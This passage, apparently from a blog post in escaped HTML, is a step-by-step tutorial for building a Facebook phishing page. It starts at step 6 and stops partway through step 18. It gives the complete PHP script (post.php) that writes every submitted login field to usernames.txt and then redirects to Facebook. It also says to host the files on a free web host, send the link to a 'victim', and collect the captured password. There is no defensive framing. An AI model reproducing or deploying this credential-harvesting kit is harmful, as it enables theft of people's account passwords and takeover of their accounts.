&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;6.&lt;/span&gt;Now save it on your desktop with the name&lt;span style=&quot;color: #cc0000;&quot;&gt;&amp;nbsp;index.htm&lt;/span&gt;,not index.html,remember.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: #f9f9f9; border: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: -webkit-auto;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;7.&lt;/span&gt;Now your phishing page is ready.it will look like a pic given below .&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; padding: 4px; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6JxJiNz046wf1TF_zkn12almm1fBWU0fNyQQsl0ZH4-w9ABkpCk6zmWhTe9rdjduShsnSDMXQuUYF5x7dFXYBGJee3X-u7NtyyMzxcWQ06maeEo_NAflVDF-lq1q-4AoiaHl-pLobq_Y/s1600/post-99705-1213608003.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px auto; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img alt=&quot;hacking script&quot; border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6JxJiNz046wf1TF_zkn12almm1fBWU0fNyQQsl0ZH4-w9ABkpCk6zmWhTe9rdjduShsnSDMXQuUYF5x7dFXYBGJee3X-u7NtyyMzxcWQ06maeEo_NAflVDF-lq1q-4AoiaHl-pLobq_Y/s200/post-99705-1213608003.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; title=&quot;index.html&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 13px;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;index&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;8.&lt;/span&gt;Open a new notepad and save the given data with the name&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;u&gt;&amp;nbsp;post.php&lt;/u&gt;&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;header (&#39;Location:http://www.facebook.com/&#39;);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;$handle = fopen(&quot;usernames.txt&quot;, &quot;a&quot;);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;foreach($_POST as $variable =&amp;gt; $value) {&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp;fwrite($handle, $variable);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp;fwrite($handle, &quot;=&quot;);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp;fwrite($handle, $value);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp;fwrite($handle, &quot;\r\n&quot;);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;}&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;fwrite($handle, &quot;\r\n&quot;);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;fclose($handle);&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;exit;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;?&amp;gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;9.&lt;/span&gt;You have two files now one is&amp;nbsp;&lt;span style=&quot;color: #cc0000;&quot;&gt;index.htm&amp;nbsp;&lt;/span&gt;and another is&lt;span style=&quot;color: #cc0000;&quot;&gt;&amp;nbsp;post.php&lt;/span&gt;,remember file extension is important.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;10.&lt;/span&gt;Now u have to upload it in a web hosting site ,i prefer u to use&amp;nbsp;&lt;a href=&quot;http://www.000webhost.com/&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot;&gt;www.000webhost.com&lt;/a&gt;&amp;nbsp;or else&amp;nbsp;&lt;a href=&quot;http://www.%2Cmy3gb.com/&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px; outline: none; padding: 0px; text-decoration: none;&quot;&gt;www.,my3gb.com&lt;/a&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;11.&lt;/span&gt;I&amp;nbsp;prefer u to use&amp;nbsp;&lt;span style=&quot;color: #990000;&quot;&gt;000webhost&amp;nbsp;&lt;/span&gt;because it will be easy to use.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtIoVYVaCDTjfwbNsm-hRPTT4YVop4iWXjFqGHdxwi_VkatL5VJZEbmlii6w9ogzRVbROkM8iocp1ZyIgiSHRWDB7spMobKpgHTQEJMyQvuCratOqcNJkevX0JhOggHvUZRiN8mqJbAzA/s1600/Untitled1.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img alt=&quot;hosting website&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtIoVYVaCDTjfwbNsm-hRPTT4YVop4iWXjFqGHdxwi_VkatL5VJZEbmlii6w9ogzRVbROkM8iocp1ZyIgiSHRWDB7spMobKpgHTQEJMyQvuCratOqcNJkevX0JhOggHvUZRiN8mqJbAzA/s1600/Untitled1.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; title=&quot;000webhost.com&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;12.&lt;/span&gt;You have to make a account in that ,after that it looks like a picture given below.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwdl9yHNqWSxu2J7YkCtCdH0VAdNNi-3TeR4SDRc8rqUPbsd6k9YgJembWl9WjAdXCjLGLMb3kODvKoPkwdPv3F5Z5kYmKaQyh_foBwE6JrhxlSGJpQk-TaH3Bmzn6l-wQm4icNei6QsM/s1600/Untitled.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img alt=&quot;facebook script hosting website&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwdl9yHNqWSxu2J7YkCtCdH0VAdNNi-3TeR4SDRc8rqUPbsd6k9YgJembWl9WjAdXCjLGLMb3kODvKoPkwdPv3F5Z5kYmKaQyh_foBwE6JrhxlSGJpQk-TaH3Bmzn6l-wQm4icNei6QsM/s1600/Untitled.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; title=&quot;hosting website&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;13.&lt;/span&gt;Now go&amp;nbsp;&lt;span style=&quot;color: #990000;&quot;&gt;control panne&lt;/span&gt;l,then on&amp;nbsp;&lt;span style=&quot;color: #990000;&quot;&gt;file manager&lt;/span&gt;.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;14.&lt;/span&gt;After that a new window will pop up.Now go to&lt;span style=&quot;color: #990000;&quot;&gt;&amp;nbsp;public_html.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLlxY1Ennsw3scqNGxhUJhtAcL9TYT9DC2vGtPhTt0Y5I9cOfUIQWARvrVm9fkDRGkGjyCHt4j7i4Bj51y8GItGoYyO6Q7w65QFwL9ruOBrg05wfV-IMn_mFWQApKk3-W404cuz2aIRBM/s1600/Untitled+2.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLlxY1Ennsw3scqNGxhUJhtAcL9TYT9DC2vGtPhTt0Y5I9cOfUIQWARvrVm9fkDRGkGjyCHt4j7i4Bj51y8GItGoYyO6Q7w65QFwL9ruOBrg05wfV-IMn_mFWQApKk3-W404cuz2aIRBM/s1600/Untitled+2.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #990000;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;15.&lt;/span&gt;Delete the file named&lt;span style=&quot;color: #cc0000;&quot;&gt;&amp;nbsp;default.php&lt;/span&gt;,after that upload two files&lt;span style=&quot;color: #990000;&quot;&gt;&amp;nbsp;index.htm&lt;/span&gt;&amp;nbsp;and&amp;nbsp;&lt;span style=&quot;color: #990000;&quot;&gt;post.php&amp;nbsp;&lt;/span&gt;one by &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;one .&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;div class=&quot;separator&quot; style=&quot;border: none; clear: both; list-style: none; margin: 0px; outline: none; padding: 0px; text-align: center;&quot;&gt;
&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizqG07GXNa0-pub_DLZnnRSh-gg66ga73bYrHW0QVj_fzhTzE1Xlnbn7vm0S2hEZ-ecsrtB6zgur0JBfXYwzPxkDziFzMfNfyJcZ0FhMszgnvffVqkY-gJYWBWeQOimAVzXXhYtZHfbAI/s1600/Untitled+3.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizqG07GXNa0-pub_DLZnnRSh-gg66ga73bYrHW0QVj_fzhTzE1Xlnbn7vm0S2hEZ-ecsrtB6zgur0JBfXYwzPxkDziFzMfNfyJcZ0FhMszgnvffVqkY-gJYWBWeQOimAVzXXhYtZHfbAI/s1600/Untitled+3.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;16.&lt;/span&gt;Now the last step click on view of index.htm it will look same as facebook page.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; padding: 4px; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;i&gt;&lt;b&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieA1f_tFKpW4L_h6hHleFU6ZgpZc92EKdg4NgoMm-GVSbwq9Ck9pEDJlSm1NZJxrSfs32GgPGXvcmrsBN9iXgdHBnIbnfwEzOLVKoBmlWZDFYPA5-j-eIhTLYHbO_Z15S6GiQv5loBZrA/s1600/Untitled+4.png&quot; imageanchor=&quot;1&quot; style=&quot;border: 0px; color: #818181; list-style: none; margin: 0px auto; outline: none; padding: 0px; text-align: left; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;179&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieA1f_tFKpW4L_h6hHleFU6ZgpZc92EKdg4NgoMm-GVSbwq9Ck9pEDJlSm1NZJxrSfs32GgPGXvcmrsBN9iXgdHBnIbnfwEzOLVKoBmlWZDFYPA5-j-eIhTLYHbO_Z15S6GiQv5loBZrA/s320/Untitled+4.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 4px solid rgb(255, 255, 255); box-shadow: rgba(0, 0, 0, 0.8) 0px 0px 4px; display: block; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px;&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 13px;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;&lt;u&gt;this is your&amp;nbsp;Facebook&amp;nbsp;phishing page&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;17.&lt;/span&gt;Copy the&amp;nbsp;&lt;span style=&quot;color: #990000;&quot;&gt;url&lt;/span&gt;&amp;nbsp;of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-family: sans-serif; line-height: 19px;&quot;&gt;&lt;span style=&quot;color: #cc0000;&quot;&gt;18.&lt;/span&gt;Open your&lt;span style=&quot;color: #990000;&quot;&gt;&amp;nbsp;000webhost account&lt;/span&gt;&amp;nbsp;and go to&lt;span style=&quot;color: #990000;&quot;&gt;&amp;nbsp;file manager&lt;/span&gt;&amp;nbsp;then&lt;span style=&quot;color: #990000;&quot;&gt;&amp;nbsp;public_html,&lt;/span&gt;here you find a new file named&lt;span 